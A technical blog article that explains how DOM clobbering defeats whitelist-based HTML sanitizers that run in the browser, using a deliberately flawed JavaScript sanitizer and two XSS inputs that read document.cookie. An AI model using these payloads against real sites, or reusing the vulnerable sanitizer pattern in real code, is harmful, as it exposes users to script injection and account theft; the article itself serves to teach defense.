Sanitizing HTML – the DOM clobbering issue
December 20, 2015
When email first began, back in the mists of computing history, messages were only plain text. As it moved into the mainstream, users wanted to add more advanced formatting, and so email clients allowed HTML to be used to mark up rich-text emails, since it seemed to be working so well for this whole world wide web thing.
While HTML adds immense formatting power to email, the lack of any standardization of exactly which subset of HTML and CSS to support has led to a world of pain for authors trying to make their emails render consistently everywhere. Email clients range from those with support for pretty much all of the latest HTML/CSS features (such as Apple’s Mail.app) to Microsoft Outlook, which thinks that Word is an acceptable HTML renderer. Sigh.
Developers of webmail systems have an extra problem to deal with. The HTML of the email must be embedded inside the HTML that defines the site’s whole user interface, without breaking the rest of the page and, most importantly, without allowing any script or other potentially malicious content to slip through. Since such code would execute in the same context as the webmail system itself, it could potentially take over the user’s account and steal their data. (This is known as a Cross-Site Scripting, or XSS, attack.) Therefore the HTML in the email must be transformed, or sanitized, into a version that preserves as much formatting as possible while removing anything potentially dangerous.
HTML is essentially just a serialization format for the Document Object Model (DOM). To be 100% safe in sanitizing it, your code must know exactly how the browser will interpret the HTML when building its DOM tree. For various reasons, this is very complicated. There is now a spec that defines how to handle every edge case, but it is long, and pretty much only web browsers have ever implemented it fully. Therefore, most sanitizers that operate on the server use a simplified version of the parsing rules, and any discrepancies may lead to security holes.
For rich web clients that construct the UI using JavaScript, however, there is an alternative option: sanitizing in the browser. The hardest part of HTML sanitization is parsing the markup exactly as the browser does. And the one thing you can guarantee will parse the HTML exactly as the browser does is the browser itself!
All modern (and even most not-so-modern) browsers now include APIs for parsing HTML into a DOM tree without executing any scripts or making any network requests (to load images, for example). You can then manipulate this tree to clean out anything potentially dangerous before importing it into your “live” DOM (at which point scripts run, images load, and the user sees the result on their screen).
So now our sanitization is simple, right? We iterate through the inert DOM tree, apply a whitelist of allowed tags and attributes, remove anything we don’t want and then import the final safe result. Well, kind of, yes. But oh my, the devil is in the details. Allow me to introduce you to DOM clobbering…
## DOM Clobbering
The DOM is the API that allows JavaScript code running in the browser to access and manipulate a tree-based representation of the document, initially built by parsing the HTML of the page. The original APIs were thrown together quickly by a single browser without standardization, and then copied by all the other browsers in order to maintain compatibility with sites coded specifically for their competitor. Thankfully, that’s not how things work today (at least, most of the time!), but all modern browsers still maintain support for these outdated features so that (very) old pages continue to work.
You absolutely do not want to use these features in any new code, as they are astonishingly badly thought out, and there are much better ways now to accomplish the same things. However, this means that many people don’t know or have forgotten about them. And their presence can still lead to massive security holes.
Let’s look at the problem by example. Here’s a little script that looks perfectly reasonable for sanitizing some untrusted HTML. We use a whitelist only, so we can’t be fooled by malicious things we don’t know about, and for the sake of this exercise let’s presume that nothing that could be used maliciously has accidentally made it into the whitelist.
```
// A real whitelist would probably include a lot more safe things!
// This has been abbreviated for demonstration purposes.
var whitelist = {
    nodes: { BODY: true, FORM: true, A: true, B: true, IMG: true },
    attributes: { alt: true, style: true }
};

function cleanNode( node ) {
    if ( !whitelist.nodes[ node.nodeName ] ) {
        node.parentNode.removeChild( node );
        return;
    }
    var attributes = node.attributes;
    var children = node.childNodes;
    var name, l;
    l = attributes.length;
    while ( l-- ) {
        name = attributes[l].name;
        if ( !whitelist.attributes[ name ] ) {
            node.removeAttribute( name );
        }
    }
    l = children.length;
    while ( l-- ) {
        cleanNode( children[l] );
    }
}
```
```
function sanitiseHTML( html ) {
    var doc = new DOMParser().parseFromString( html, 'text/html' );
    cleanNode( doc.body );
    return doc.body.innerHTML;
}
```
For those not familiar with JavaScript, here is briefly what this code does:
1. Creates an inert document and parses our potentially dangerous HTML.
2. Starting at the `<body>` node (the root node for user-visible content), it uses a simple recursive descent to walk the DOM tree and remove any attribute or node not in the whitelist. If a node is "bad", we remove it and all its children; we don't try to keep the children at all.
3. We then return the HTML that represents the now "clean" DOM.
At first glance, this looks perfectly reasonable. And indeed, a quick Google around shows [very similar looking functions in the wild](https://github.com/basecamp/trix/blob/d42e722c7af21572fc8386a0f20351151062845d/src/trix/models/html_parser.coffee#L227). Sadly, this is actually riddled with security holes, and the main reason is DOM clobbering. Let's have a look at a few ways we can break this (there are more; I leave those as an exercise to the reader).
### Security hole 1
For this first method of breaking the above, we'll presume `name` is not in your whitelist of allowed attributes, because you don't want to risk a conflict with existing names you already have in the page. Perfectly reasonable, very security conscious. But now watch what happens if you pass the following to the sanitizer:
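An input along these lines does the trick (the exact markup is illustrative, and the `alert` is a stand-in for an attacker's real payload):

```
<img name="body">
<script>alert(document.cookie)</script>
```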
You'll find the output is this (except in Chrome, which seems to have recently fixed this kind of clobbering; good job Chrome):
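Roughly the following (illustrative; the key point is that the `<script>` survives intact):

```
<img>
<script>alert(document.cookie)</script>
```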
Oh dear! The attacker just managed to get a script through, and your users' data has now been compromised. How did this happen? Well, if you have an `<img>` with a `name` attribute, the browser will helpfully add a property with that name to the `document` object, giving direct access to the DOM node representing the image, even though this masks the built-in `document.body` property (which normally points to the root `<body>` node)! So when we call `cleanNode( doc.body )`, we actually just sanitize the image and never see the rest of the document.
The really clever bit is that sanitizing the image removes its `name` attribute, which stops the property from masking the real `body` node on the `document`. So when we return the `innerHTML`, we actually return all the nodes, including the unsanitized `<script>`!
### Security hole 2
OK, let's say you've fixed that (maybe you cached a known-good reference to the `document.getElementsByTagName` method and called that to get the `<body>`). Feeling safe now? Well sorry, our code is still fatally flawed. Consider HTML along these lines:

```
<form><input name="childNodes"><img src="x" onerror="alert(document.cookie)"></form>
```
You might guess where this is going. The `childNodes` property on the `<form>` node has been clobbered: form controls with a `name` are exposed as properties on their form element, masking the built-in DOM properties. So when our sanitizer asks the form for its `childNodes`, it gets the `<input>` element instead of the real child list, the recursion goes nowhere, and the form's actual children are never cleaned.
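Why does the walk fail so quietly rather than throwing an error? An element standing in for the real `childNodes` list has no `length` property, so the sanitizer reads `undefined`, and `undefined--` evaluates to `NaN`, which is falsy. A plain-JavaScript sketch, with an empty object standing in for the clobbering `<input>`:

```
// Stand-in for the <input> that clobbered form.childNodes:
// like a DOM element node, it has no `length` property.
var children = {};

var visits = 0;
var l = children.length;   // undefined
while ( l-- ) {            // undefined-- yields NaN, which is falsy
    visits += 1;           // never reached
}
console.log( visits );     // 0: the form's real children go unexamined
```

The same silent no-op happens inside `cleanNode`, which is what lets everything inside the `<form>` escape the whitelist entirely.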